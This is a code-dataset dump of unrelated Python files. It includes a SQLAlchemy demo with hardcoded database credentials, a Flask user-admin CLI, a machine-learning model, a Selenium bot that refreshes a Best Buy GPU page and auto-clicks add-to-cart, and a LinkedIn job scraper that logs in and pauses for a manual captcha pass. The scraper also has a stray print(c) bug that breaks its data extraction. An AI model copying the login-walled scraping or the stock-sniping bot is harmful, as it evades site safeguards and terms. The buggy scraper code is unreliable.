self._selected = False\n super(StorageForSellItemCMHandler, self).__init__(cmProxy, ctx, {_StorageOptions.INFORMATION: 'showInformation',\n _StorageOptions.SELL: 'sellItem',\n _StorageOptions.SALE_OPTION: 'changeSaleOption'})\n\n def showInformation(self):\n showStorageModuleInfo(self._intCD)\n\n @process\n def sellItem(self):\n yield DialogsInterface.showDialog(SellModuleMeta(int(self._intCD)))\n\n def changeSaleOption(self):\n self.fireEvent(events.StorageEvent(events.StorageEvent.SELECT_MODULE_FOR_SELL, ctx={'intCD': self._intCD}), scope=EVENT_BUS_SCOPE.LOBBY)\n\n def _generateOptions(self, ctx=None):\n if self._selected:\n label = MENU.cst_item_ctx_menu('prohibitSale')\n else:\n label = MENU.cst_item_ctx_menu('allowSale')\n return [self._makeItem(_StorageOptions.INFORMATION, MENU.cst_item_ctx_menu(_StorageOptions.INFORMATION)), self._makeItem(_StorageOptions.SELL, MENU.cst_item_ctx_menu(_StorageOptions.SELL)), self._makeItem(_StorageOptions.SALE_OPTION, label)]\n\n def _initFlashValues(self, ctx):\n self._intCD = int(ctx.id)\n self._selected = ctx.selected\n","sub_path":"source/res/scripts/client/gui/Scaleform/daapi/view/lobby/storage/storage_cm_handlers.py","file_name":"storage_cm_handlers.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"573128706","text":"'''\nTwo City Scheduling\nSolution\nThere are 2N people a company is planning to interview. The cost of flying the i-th person to city A is costs[i][0], and the cost of flying the i-th person to city B is costs[i][1].\n\nReturn the minimum cost to fly every person to a city such that exactly N people arrive in each city.\n\n\n\nExample 1:\n\nInput: [[10,20],[30,200],[400,50],[30,20]]\nOutput: 110\nExplanation:\nThe first person goes to city A for a cost of 10.\nThe second person goes to city A for a cost of 30.\nThe third person goes to city B for a cost of 50.\nThe fourth person goes to city B for a cost of 20.\n\nThe total minimum cost is 10 + 30 + 50 + 20 = 110 to have half the people interviewing in each city.\n'''\n\n\nclass Solution(object):\n def twoCitySchedCost(self, costs):\n \"\"\"\n :type costs: List[List[int]]\n :rtype: int\n \"\"\"\n\n # my idea is to order the differences first and then decide\n # how to schedule\n difs = []\n N = len(costs)\n for i in range(N):\n difs.append([abs(costs[i][0] - costs[i][1]), i])\n\n ''' ok, I checked faster answers, so we don;t have to\n create the variable difs, but just directly sort costs based \n on lambda x: abs(x[0] - x[1])\n '''\n\n difs.sort(key=lambda x: x[0], reverse=True)\n\n A = 0;\n B = 0\n sum_cost = 0\n i = 0\n while i < N:\n\n if costs[difs[i][1]][0] < costs[difs[i][1]][1] and A < N // 2:\n A += 1\n sum_cost += costs[difs[i][1]][0]\n elif B < N // 2:\n sum_cost += costs[difs[i][1]][1]\n B += 1\n else:\n sum_cost += costs[difs[i][1]][0]\n i += 1\n\n return sum_cost","sub_path":"leetcode/NewCityScheduling.py","file_name":"NewCityScheduling.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"293946027","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2018/2/28 17:16\n# @Author : Py.qi\n# @File : sqlalchemy_expression.py\n# @Software: PyCharm\n\nfrom sqlalchemy import Column,Integer,String\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.ext.declarative import declarative_base\n#echo输出详细\nengine = create_engine(\"mysql+pymysql://root:root@localhost:3306/voxel\",max_overflow=5)\nbase=declarative_base() #创建基类\nclass user(base):\n __tablename__ = 'users'\n id = Column(Integer,primary_key=True,autoincrement=True)\n hostname=Column(String(64),unique=False,nullable=False)\n ip_addr=Column(String(56),unique=False,nullable=False)\n port=Column(Integer,default=22)\n#寻找Base的所有子类,按照子类的结构在数据库中生成对应的数据表信息\nbase.metadata.drop_all(engine)\nbase.metadata.create_all(engine)\n\nSession=sessionmaker(bind=engine)\nsession=Session()\n#增,插入单行\nu = user(hostname='zs',ip_addr='333',port=22)\n\nsession.add(u)\n#插入多行\nsession.add_all([user(hostname='ls',ip_addr='111',port=873),\n user(hostname='ww',ip_addr='888',port=23),\n user(hostname='dff',ip_addr='567',port=3306)\n ])\n#写入数据库\nsession.commit()\n\n#删除\nsession.query(user).filter(user.id > 3).delete()\nsession.commit()\n\n#修改\nsession.query(user).filter(user.id == 3).update({'hostname':'feng','port':3389})\nsession.commit()\n\n#查\nret=session.query(user).filter_by(hostname='feng').first()\nprint(ret)\nret = session.query(user).filter_by(hostname='feng').all()\nprint(ret)\n\nret = session.query(user).filter(user.hostname.in_(['sb','bb'])).all()\nprint(ret)\n\n# ret = session.query(User.name.label('name_label')).all()\n# print(ret,type(ret))\n\nret = session.query(user).order_by(user.id).all()\nprint(ret)\n\n# ret = session.query(User).order_by(User.id)[1:3]\n\nprint(ret)\nsession.commit()","sub_path":"test/sql_test2.py","file_name":"sql_test2.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"17775141","text":"# Copyright (c) 2019 Horizon Robotics. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport unittest\nimport random\nimport os\nimport time\nimport json\nimport social_bot\nfrom absl import logging\nfrom grocery_ground import GroceryGround\n\n\nclass TestGroceryGround(unittest.TestCase):\n def test_grocery(self):\n with_language = True\n agents = [\n 'pioneer2dx_noplugin', 'pr2_noplugin', 'icub', 'icub_with_hands',\n 'youbot_noplugin'\n ]\n tasks = ['goal', 'kickball']\n with open(\n os.path.join(social_bot.get_model_dir(), \"agent_cfg.json\"),\n 'r') as cfg_file:\n agent_cfgs = json.load(cfg_file)\n for agent_type in agents:\n for task_name in tasks:\n for use_image_obs in [True, False]:\n agent_cfg = agent_cfgs[agent_type]\n if agent_cfg['camera_sensor'] == '' and use_image_obs:\n continue\n logging.info(\"Testing Case: Agent \" + agent_type +\n \", Task \" + task_name + \", UseImage: \" +\n str(use_image_obs))\n env = GroceryGround(\n with_language=with_language,\n use_image_observation=use_image_obs,\n image_with_internal_states=True,\n agent_type=agent_type,\n task_name=task_name)\n step_cnt = 0\n last_done_time = time.time()\n while step_cnt < 500 and (\n time.time() - last_done_time) < 10:\n actions = env._control_space.sample()\n if with_language:\n actions = dict(control=actions, sentence=\"hello\")\n env.step(actions)\n step_cnt += 1\n step_per_sec = step_cnt / (time.time() - last_done_time)\n logging.info(\"Test Passed, FPS: \" + str(step_per_sec))\n env.close()\n\n\nif __name__ == '__main__':\n logging.set_verbosity(logging.INFO)\n unittest.main()\n","sub_path":"python/social_bot/envs/grocery_ground_test.py","file_name":"grocery_ground_test.py","file_ext":"py","file_size_in_byte":2722,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"253866997","text":"from __future__ import print_function\nimport numpy as np\n\nimport tensorflow as tf\nfrom tensorflow.keras.layers import Input, Dense, Activation, BatchNormalization, Flatten, Conv1D, concatenate, Lambda\nfrom tensorflow.keras.models import Model\nimport tensorflow.keras.backend as K\nfrom tensorflow.keras.utils import plot_model\nfrom tensorflow.keras.initializers import glorot_uniform, glorot_uniform\nfrom tensorflow.keras import regularizers\nfrom tensorflow.keras.activations import softmax, relu\n\ndef QuasarNET(input_shape = None, boxes = 13, nlines = 1, reg_conv = 0., reg_fc=0, offset_activation_function='rescaled_sigmoid'):\n\n X_input = Input(input_shape)\n X = X_input\n\n # Set the parameters.\n ## Number of convolutional layers\n nlayers = 4\n ## Number of filters in convolutional layers.\n nfilters_conv = 100\n ## Max number of filters per layer.\n nfilters_max = 100\n ## Size of each filter.\n filter_size=10\n ## Stride length.\n strides = 2\n\n # Set up the convolutional layers.\n for stage in range(nlayers):\n ## Convolutional layer with glorot_uniform initial weights, regularised\n ## with an l2 norm (set to 0 by default).\n X = Conv1D(nfilters_conv, filter_size, strides = strides,\n name = 'conv_{}'.format(stage+1),\n kernel_initializer=glorot_uniform(),\n kernel_regularizer=regularizers.l2(reg_conv))(X)\n ## Batch normalise in features (axis=-1).\n X = BatchNormalization(axis=-1)(X)\n ## Apply relu activation.\n X = Activation('relu')(X)\n\n # Set up the final, fully-connected layer, batch normalising and applying a\n # relu activation function.\n X = Flatten()(X)\n X = Dense(nfilters_max, activation='linear', name='fc_common')(X)\n X = BatchNormalization()(X)\n X = Activation('relu', name='fc_activation')(X)\n\n # Build the \"feature detection\" units for each line.\n outputs = []\n X_box = []\n if offset_activation_function=='sigmoid':\n tf_activation_function = 'sigmoid'\n elif offset_activation_function=='rescaled_sigmoid':\n tf_activation_function = 'sigmoid'\n elif offset_activation_function=='linear':\n tf_activation_function = 'linear'\n for i in range(nlines):\n ## Set up the boxes to determine the coarse location of the line.\n X_box_aux = Dense(boxes, activation='sigmoid',\n name='fc_box_{}'.format(i),\n kernel_initializer=glorot_uniform())(X)\n\n ## Set up the offsets to determine the offset within each box.\n X_offset_aux = Dense(boxes, activation=tf_activation_function,\n name='fc_offset_{}'.format(i),\n kernel_initializer=glorot_uniform())(X)\n\n if offset_activation_function in ['rescaled_sigmoid','linear']:\n ## Rescale the offsets to output between -0.1 and 1.1.\n X_offset_aux = Lambda(lambda x:-0.1+1.2*x)(X_offset_aux)\n\n X_box_aux = concatenate([X_box_aux, X_offset_aux],\n name=\"conc_box_{}\".format(i))\n X_box.append(X_box_aux)\n\n for b in X_box:\n outputs.append(b)\n\n # Produce the final model.\n model = Model(inputs=X_input, outputs=outputs, name='QuasarNET')\n\n return model\n\ndef custom_loss(y_true, y_pred):\n # Assert that the predictions have an even number of columns, corresponding\n # to the box confidence and offset for each box.\n assert y_pred.shape[1]%2 == 0\n\n nboxes = y_pred.get_shape().as_list()[1]//2\n\n # Construct the first two terms in the loss (see equation (1) in\n # Busca et al. 2018), relating to the box confidence.\n N1 = tf.math.reduce_sum(y_true[...,0:nboxes], axis=1) + K.epsilon()\n N2 = tf.math.reduce_sum((1-y_true[...,0:nboxes]), axis=1) + K.epsilon()\n loss_class = -tf.math.reduce_sum(y_true[...,0:nboxes]*tf.math.log(K.clip(y_pred[...,0:nboxes], K.epsilon(), 1-K.epsilon())), axis=1)/N1\n loss_class -= tf.math.reduce_sum((1-y_true[...,0:nboxes])*tf.math.log(K.clip(1-y_pred[...,0:nboxes], K.epsilon(), 1-K.epsilon())), axis=1)/N2\n\n # Construct the final term in the loss (see equation (1) in\n # Busca et al. 2018), relating to the offset within each box.\n offset_true = y_true[...,nboxes:]\n\n offset_pred = y_pred[...,nboxes:]\n doffset = tf.math.subtract(offset_true, offset_pred)\n loss_offset = tf.math.reduce_sum(y_true[...,0:nboxes]*tf.math.square(doffset), axis=1)/N1\n\n return tf.math.add(loss_class, loss_offset)\n","sub_path":"py/quasarnet/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4472,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"168971257","text":"#!flask/bin/python\n\nimport sys\nimport click\nfrom os import getenv, path\n\nfrom app import db\nfrom app.models import User, Annotation, Collection\n\nfrom flask import json, current_app\nfrom sqlalchemy.exc import IntegrityError\n\n\ndef register_cli(app):\n\n \"\"\" Base Methods \"\"\"\n\n def run_init_db():\n\n try:\n db.create_all()\n click.echo(\"Database initiated!\")\n\n except:\n click.echo(\"Unexpected error: {0}\".format(sys.exc_info()[0]))\n\n def run_drop_db():\n\n if click.confirm(\"WARNING! Drop all databases?\", abort=True):\n\n try:\n db.drop_all()\n click.echo(\"Database erased!\")\n\n except:\n click.echo(\"Unexpected error: {0}\".format(sys.exc_info()[0]))\n\n def run_create_app_user():\n\n user = User(username=getenv(\"USER_USERNAME\"),\n email=getenv(\"USER_EMAIL\"),\n is_admin=False)\n user.validate_password(getenv(\"USER_PASSWORD\"))\n\n try:\n db.session.add(user)\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created App User!\")\n click.echo(\" \".format(user))\n\n def run_create_app_admin():\n\n user = User(username=getenv(\"ADMIN_USERNAME\"),\n email=getenv(\"ADMIN_EMAIL\"),\n is_admin=True)\n user.validate_password(getenv(\"ADMIN_PASSWORD\"))\n\n try:\n db.session.add(user)\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created App Admin!\")\n click.echo(\" \".format(user))\n\n def run_create_welcome_annotations():\n\n welcome_json = path.join(current_app.root_path, \"init\", \"welcome.json\")\n\n with open(welcome_json) as f:\n welcome = json.load(f)\n\n Collection.restore(welcome[\"collections\"])\n\n for annotation in welcome[\"annotations\"]:\n\n importing = Annotation()\n importing.deserialize(annotation)\n\n db.session.add(importing)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n else:\n click.echo(\"Added welcome annotations!\")\n\n def show_current_users():\n\n users = User.query.all()\n click.echo(\"Current users:\")\n click.echo(\"------------------------------\")\n click.echo(users)\n click.echo(\"------------------------------\")\n\n \"\"\" CLI Methods \"\"\"\n\n @app.cli.command(\n name=\"init_db\",\n help=\"Create all tables.\")\n def init_db():\n run_init_db()\n\n @app.cli.command(\n name=\"drop_db\",\n help=\"Drop all tables.\")\n def drop_db():\n run_drop_db()\n\n @app.cli.command(\n name=\"init_beta\",\n help=\"Create default user and welcome annotations.\")\n def init_beta():\n run_create_welcome_annotations()\n\n @app.cli.command(\n name=\"create_app_user\",\n help=\"Create app user.\")\n def create_app_user():\n run_create_app_user()\n\n @app.cli.command(\n name=\"create_app_admin\",\n help=\"Create app admin.\")\n def create_app_admin():\n run_create_app_admin()\n\n @app.cli.command(\n name=\"create_welcome_annotations\",\n help=\"Create welcome annotations.\")\n def create_welcome_annotations():\n run_create_welcome_annotations()\n\n @app.cli.command(\n name=\"create_user\",\n help=\"Create single user.\")\n def create_user():\n\n click.echo(\"Create user...\")\n\n username = click.prompt(\"Username\")\n password = click.prompt(\"Password (6-32)\", hide_input=True, confirmation_prompt=True)\n email = click.prompt(\"Email\")\n is_admin = click.prompt(\"Admin?\", type=bool, default=False)\n\n user = User(username=username, email=email, is_admin=is_admin)\n user.validate_password(password)\n\n db.session.add(user)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Created User!\")\n click.echo(\" \".format(user))\n\n @app.cli.command(\n name=\"delete_user\",\n help=\"Delete single user.\")\n def delete_user():\n\n show_current_users()\n\n click.echo(\"Delete user...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! Delete user?\", abort=True):\n\n db.session.delete(user)\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Deleted user!\")\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"edit_user\",\n help=\"Edit single user.\")\n def edit_user():\n\n show_current_users()\n\n click.echo(\"Edit User...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! Edit user?\", abort=True):\n\n if click.confirm(\"Change Username?\"):\n new_username = click.prompt(\"New Username (3-32)\")\n user.username = new_username\n\n if click.confirm(\"Change Password?\"):\n new_password = click.prompt(\"New Password (6-32)\", hide_input=True, confirmation_prompt=True)\n user.validate_password(new_password)\n\n if click.confirm(\"Change Email?\"):\n new_email = click.prompt(\"New Email\")\n user.email = new_email\n\n if click.confirm(\"Change Admin Status?\"):\n new_admin_status = click.prompt(\"New Admin Status?\", type=bool)\n user.is_admin = new_admin_status\n\n try:\n db.session.commit()\n\n except AssertionError as error:\n db.session.rollback()\n click.echo(error)\n\n except IntegrityError as error:\n db.session.rollback()\n click.echo(error)\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Updated User!\")\n click.echo(\" \".format(user))\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"generate_new_api_key\",\n help=\"Generate new token.\")\n def generate_new_api_key():\n\n show_current_users()\n\n click.echo(\"Generate new API key...\")\n\n username = click.prompt(\"Username\")\n\n user = User.query.filter_by(username=username).first()\n\n if user and click.confirm(\"User exists! Generate new API Key?\", abort=True):\n\n user.new_api_key()\n click.echo(\"New API Key: {0}\".format(user.api_key))\n\n else:\n\n click.echo(\"User does not exist!\")\n\n @app.cli.command(\n name=\"reset_user\",\n help=\"Erase and re-create user.\")\n def reset_user():\n\n if click.confirm(\"WARNING! Reset user to default?\", abort=True):\n\n # Remove all users\n User.query.delete()\n\n try:\n db.session.commit()\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Removed all users!\")\n\n # Create users\n run_create_app_user()\n\n @app.cli.command(\n name=\"erase_all_annotations\",\n help=\"Erase annotations.\")\n def erase_all_annotations():\n\n if click.confirm(\"WARNING! Reset annotations?\", abort=True):\n\n # Remove all annotations\n for annotation in Annotation.query.all():\n annotation.delete()\n\n try:\n db.session.commit()\n\n except:\n db.session.rollback()\n click.echo(\"Unexpected error: {0}.\".format(sys.exc_info()[0]))\n\n else:\n click.echo(\"Removed all annotations!\")\n\n @app.cli.command(\n name=\"reset_app\",\n help=\"Drop databases & re-create users.\")\n def reset_app():\n\n if click.confirm(\"WARNING! Perform full reset?\", abort=True):\n\n run_drop_db()\n run_init_db()\n run_create_app_user()\n","sub_path":"app/cli.py","file_name":"cli.py","file_ext":"py","file_size_in_byte":9976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"119478652","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.firefox.options import Options\nimport datetime\nimport time\nimport winsound\n\nALARM_BEEP_DURATION = 1000 # milliseconds\nALARM_FREQ = 440 # Hz\nALARM_DURATION = 5 # 2n sec\nfirefox_profile_path = r'C:\\Users\\Justin\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\j4e948dv.default-release'\n# url = 'https://www.bestbuy.com/site/amd-ryzen-5-5600x-4th-gen-6-core-12-threads-unlocked-desktop-processor-with-wraith-stealth-cooler/6438943.p?skuId=6438943'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3060-ti-8gb-gddr6-pci-express-4-0-graphics-card-steel-and-black/6439402.p?skuId=6439402'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3070-8gb-gddr6-pci-express-4-0-graphics-card-dark-platinum-and-black/6429442.p?skuId=6429442'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3070-ti-8gb-gddr6x-pci-express-4-0-graphics-card-dark-platinum-and-black/6465789.p?skuId=6465789'\n# url = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3080-10gb-gddr6x-pci-express-4-0-graphics-card-titanium-and-black/6429440.p?skuId=6429440'\nurl = 'https://www.bestbuy.com/site/nvidia-geforce-rtx-3090-24gb-gddr6x-pci-express-4-0-graphics-card-titanium-and-black/6429434.p?skuId=6429434'\n\n# options = Options()\n# options.headless = True\n# driver = webdriver.Firefox(options=options)\nprofile = webdriver.FirefoxProfile(firefox_profile_path)\ndriver = webdriver.Firefox(firefox_profile=profile)\n\ndriver.get(url)\ntry:\n while True:\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n \n if 'btn-disabled' in add_to_cart_but.get_attribute(\"class\"):\n time.sleep(2)\n driver.refresh()\n else:\n break\n\n # add_on_checkbox = WebDriverWait(driver, 10).until(\n # EC.presence_of_element_located((By.ID, 'add-on-selector-add-on-item-checkbox')))\n # add_on_checkbox.click()\n\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.element_to_be_clickable((By.CSS_SELECTOR, '.add-to-cart-button')))\n print(add_to_cart_but.value_of_css_property('background-color'))\n add_to_cart_but.click()\n\n print('1st Add to Cart button clicked. In Queue.', datetime.datetime.now())\n for _ in range(3):\n winsound.Beep(ALARM_FREQ, ALARM_BEEP_DURATION)\n time.sleep(1)\n print(add_to_cart_but.value_of_css_property('background-color'))\n\n while True:\n # add_to_cart_but = WebDriverWait(driver, 10).until(\n # EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n please_wait_enabled = add_to_cart_but.value_of_css_property('background-color')\n\n if please_wait_enabled == 'rgb(197, 203, 213)':\n time.sleep(0.05)\n else:\n break\n\n add_to_cart_but = WebDriverWait(driver, 3600).until(\n EC.presence_of_element_located((By.CSS_SELECTOR, '.add-to-cart-button')))\n add_to_cart_but.click()\n\n print('2nd Add to Cart button clicked. Item added to Cart', datetime.datetime.now())\n print(add_to_cart_but.value_of_css_property('background-color'))\n\n for _ in range(ALARM_DURATION):\n winsound.Beep(ALARM_FREQ, ALARM_BEEP_DURATION)\n time.sleep(1)\n\nexcept KeyboardInterrupt:\n print('stopping')\n\nexcept Exception as e:\n print(e)\n for _ in range(10):\n winsound.Beep(ALARM_FREQ, 500)\n time.sleep(0.5)","sub_path":"bb90.py","file_name":"bb90.py","file_ext":"py","file_size_in_byte":3631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"148084713","text":"from selenium import webdriver\nimport pandas as pd\nimport re\nfrom bs4 import BeautifulSoup\nimport os\nimport time\npd.set_option('max_colwidth', 200)\n\ncount = 0\n\n\n# Function to extract the job id from the url\ndef extract_job_id(jobs_id):\n urls = []\n\n for jobs_id in jobs_id:\n urls.append(re.findall(r'([0-9]{10})', jobs_id)[0])\n\n urls = list(map(int, urls))\n return urls\n\n\n# Function to check if the jobs to be scraped are already on the list\ndef check_repeated_jobs(new_urls, already_on_list):\n clean_url = []\n\n for i in range(len(new_urls)):\n # print(i)\n if new_urls[i] in already_on_list:\n print(new_urls[i] in already_on_list, new_urls[i])\n\n else:\n clean_url.append(new_urls[i])\n\n # print('New Links', clean_url)\n return clean_url\n\n\n# Function to scrape the job data from the web. liked_jobs is defined as '1' or '0' depending on if the job to be\n# scraped is one that the user wants to apply or not\ndef retrieve_job_data(urls, liked_job, count):\n\n browser = webdriver.Chrome(executable_path='/Users/petanth/Downloads/chromedriver')\n browser.implicitly_wait(2)\n\n # Variables to save the jobs data\n job_like = []\n post_title = []\n company_name = []\n post_date = []\n job_location_city = []\n job_location_region = []\n job_location_country = []\n job_desc = []\n level = []\n emp_type = []\n functions = []\n industries = []\n job_id = []\n link = []\n\n for urls in urls:\n print('Job_ID to be scraped: ', urls)\n\n if count == 0:\n\n browser.get(url='https://www.linkedin.com/login/es?fromSignIn=true&trk=guest_homepage-basic_nav-header-signin')\n\n browser.find_element_by_xpath(\"//*[@id='username']\").send_keys('user')\n browser.find_element_by_xpath(\"//*[@id='password']\").send_keys('password')\n browser.find_element_by_xpath(\"//*[@id='organic-div']/form/div[3]/button\").click()\n #browser.find_element_by_xpath('//*[@id=\"artdeco-global-alert-container\"]/div[1]/section/div/div[2]/button[2]').click()\n\n time.sleep(14) # sleep for 14 sec in order to pass captcha\n\n job_url = 'https://www.linkedin.com/jobs/view/' + str(urls)\n browser.get(url=job_url)\n count = count + 1\n\n else:\n job_url = 'https://www.linkedin.com/jobs/view/' + str(urls)\n browser.get(url=job_url)\n\n # Parse the html content\n soup = BeautifulSoup(browser.page_source, \"lxml\")\n\n print(\"This is the job url: \", job_url)\n\n # print(soup.prettify()) # Line used to look on HTML for the data to be scraped\n\n # job title\n try:\n job_titles = soup.find(\"h1\", class_=\"t-24 t-bold\").text.strip()\n job_titles = re.sub(\"[^a-zA-Z0-9äöüÄÖÜß\\s]+\", \" \", str(job_titles))\n job_titles = re.sub(\"\\s{2,}\", \" \", str(job_titles))\n post_title.append(job_titles)\n except:\n print('job_titles')\n post_title.append('0')\n\n # company name\n try:\n company_names = soup.find(\"span\", class_=\"jobs-unified-top-card__subtitle-primary-grouping mr2 t-black\").text.strip()\n company_names = re.split(\"\\n+\", company_names)\n company_name.append(company_names[0])\n except:\n print('company_names')\n company_name.append('0')\n\n # job location\n try:\n job_locations = soup.find(\"span\", class_=\"jobs-unified-top-card__bullet\").text.strip().split(\", \")\n\n # in case the location specified includes the city, region and country\n if len(job_locations) == 3:\n job_location_city.append(job_locations[len(job_locations)-3])\n job_location_region.append(job_locations[len(job_locations)-2])\n job_location_country.append(job_locations[len(job_locations)-1])\n\n # in case the location specified includes the region and country\n else:\n job_location_city.append('0')\n job_location_region.append(job_locations[len(job_locations)-2])\n job_location_country.append(job_locations[len(job_locations)-1])\n\n except:\n print('job location')\n job_location_city.append('0')\n job_location_region.append('0')\n job_location_country.append('0')\n\n # posting date\n try:\n post_dates = soup.find('span', class_=\"jobs-unified-top-card__posted-date\").text.strip()\n post_date.append(post_dates)\n except:\n print('posting date')\n post_date.append('0')\n\n # job description\n try:\n job_descs = soup.find(\"div\",\n class_=\"jobs-box__html-content jobs-description-content__text t-14 t-normal\").text.strip()\n # Regex to match and delete 1.two or more spaces and 2. newlines\n job_descs = re.sub(\"[^a-zA-Z0-9äöüÄÖÜß\\s]+\", \" \", str(job_descs))\n job_descs = re.sub(\"(\\s{2,})|(\\n+)|(;)\", \"\", str(job_descs))\n job_desc.append(job_descs)\n except:\n print('job description')\n job_desc.append('0')\n\n # job additional data\n try:\n print(c)\n # additional_data_container = []\n # for span in soup.find_all('div', class_='jobs-description-details'):\n # additional_data_container.append(span.text)\n #\n # # print(additional_data_container[0])\n #\n # # job level\n # level.append(additional_data_container[0])\n #\n # # job type\n # emp_type.append(additional_data_container[1])\n #\n # # job function\n # functions.append(additional_data_container[2])\n #\n # # job industry\n # industries.append(additional_data_container[3])\n #\n # # liked job (VARIABLE TO MARK IF A JOB IS ONE THAT YOU LIKE)\n # job_like.append(liked_job)\n #\n # # linkedin job id\n # job_id.append(urls)\n #\n # # job url\n # link.append(job_url)\n except:\n print('job additional data')\n level.append('0')\n emp_type.append('0')\n functions.append('0')\n industries.append('0')\n job_like.append(liked_job)\n job_id.append(urls)\n link.append(job_url)\n\n print('The number of scraped jobs is: ', len(post_title))\n print(len(job_like))\n print(len(post_date))\n print(len(company_name))\n print(len(post_title))\n print(len(job_location_city))\n print(len(job_location_region))\n print(len(job_location_country))\n print(len(job_desc))\n print(len(level))\n print(len(emp_type))\n print(len(functions))\n print(len(industries))\n print(len(job_id))\n print(len(link))\n\n # Create a DataFrame with the scraped data\n job_data = pd.DataFrame({'Liked job?': job_like,\n 'Date': post_date,\n 'Company Name': company_name,\n 'Job Title': post_title,\n 'City': job_location_city,\n 'Region': job_location_region,\n 'Country': job_location_country,\n 'Description': job_desc,\n 'Level': level,\n 'Type': emp_type,\n 'Function': functions,\n 'Industry': industries,\n 'ID': job_id,\n 'Link': link\n })\n\n # clean description column\n job_data['Description'] = job_data['Description'].str.replace('\\n', ' ')\n browser.close()\n\n return job_data\n\n\n# Function to update dataframe on an existing csv file\ndef write_in_existing_file(dataframe_jobs):\n dataframe_jobs.to_csv('ScrapeOfLikedJobs.csv', mode='a', sep='|', header=False, index=False)\n\n\n# Function to write dataframe on a new csv file\ndef write_in_new_file(dataframe_jobs):\n dataframe_jobs.to_csv('ScrapeOfLikedJobs.csv', mode='a', sep='|', index=False)\n\n\n# *******************************************\n# List of variables to be defined by the user\n# *******************************************\n\n\n# List of URLs where the text will be scraped from\nlinks = [\"https://www.linkedin.com/jobs/view/2368902042\",\n \"https://www.linkedin.com/jobs/view/2369634018\",\n \"https://www.linkedin.com/jobs/view/2379187906\",\n \"https://www.linkedin.com/jobs/view/2359622787\",\n \"https://www.linkedin.com/jobs/view/2379084299\",\n \"https://www.linkedin.com/jobs/view/2369914822\"]\n\n# Define if the jobs specified on the \"links\" variable is liked (1) or not (0)\nis_liked = '1'\n\n\n# ********************\n# Start of the program\n# ********************\nnew_job_ID_list = extract_job_id(links)\n\nif os.path.isfile('ScrapeOfLikedJobs.csv'):\n print(\"A file already exists. Reading the data...\")\n SoLJ = pd.read_csv('ScrapeOfLikedJobs.csv', sep='|')\n index = pd.Index(SoLJ['ID'])\n print(\"Checking for jobs already on the file...\")\n url = check_repeated_jobs(new_job_ID_list, index)\n\n # In case there is new jobs that are not on the list, then the new data is retrieved\n if len(url) != 0:\n print(\"List of new jobs not found on the existing file: \", url)\n print(\"Retrieving the job data from the website...\")\n 